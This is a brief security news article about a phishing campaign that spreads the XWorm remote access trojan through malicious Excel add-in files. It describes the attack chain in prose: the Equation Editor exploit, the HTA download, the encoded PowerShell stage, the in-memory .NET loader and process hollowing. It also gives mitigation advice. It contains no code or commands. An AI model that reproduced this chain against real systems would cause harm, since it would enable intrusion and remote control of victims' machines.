In a recent cybersecurity alert, experts have identified a phishing campaign that deploys an updated version of the XWorm Remote Access Trojan (RAT). This malware grants cybercriminals comprehensive control over infected Microsoft Windows systems, posing significant risks to users.
Background on XWorm RAT
First tracked in 2022, XWorm remains a prevalent threat within the digital security landscape. It is commonly circulated via Telegram-based marketplaces, making it easily accessible to a wide range of threat actors. Its persistent use underscores the need for continuous vigilance against such cyber threats.
The latest campaign employs a variety of business-themed emails, such as those related to payment verifications and shipment confirmations, to lure recipients into opening a harmful Excel add-in file (.XLAM). This tactic effectively initiates a rapid transition from document execution to the delivery of malware directly into the system’s memory.
Technical Breakdown of the Attack
The campaign was uncovered by Fortinet researchers, who detailed how the malicious Excel file exploits the CVE-2018-0802 vulnerability. This flaw in Microsoft’s Equation Editor allows remote code execution, providing a pathway for attackers to inject harmful code into a system.
Once activated, the exploit downloads an HTA file from a specified URL and executes it using ShellExecuteExW. This transition helps the malicious operation remain inconspicuous, as it mimics typical Windows processes while the harmful payload is prepared.
Payload Execution and Defense
Subsequently, the obfuscated HTA file, executed under mshta.exe, deploys a Base64-encoded PowerShell payload. This payload retrieves a hidden .NET module from an image file hosted online. The module, cleverly disguised with the assembly name Microsoft.Win32.TaskScheduler, operates in memory, making detection more challenging.
The final step involves the .NET loader decrypting and executing the XWorm payload by using process hollowing to inject it into Msbuild.exe. The RAT then communicates with a command-and-control server using encrypted traffic. To counter this, cybersecurity professionals advise patching the Equation Editor vulnerability, restricting .XLAM and HTA execution paths, and implementing strict controls on mshta.exe, PowerShell, and Msbuild.exe activities.
As cyber threats evolve, staying informed and implementing robust security measures are crucial. Follow us for more updates on emerging cyber threats and defenses.
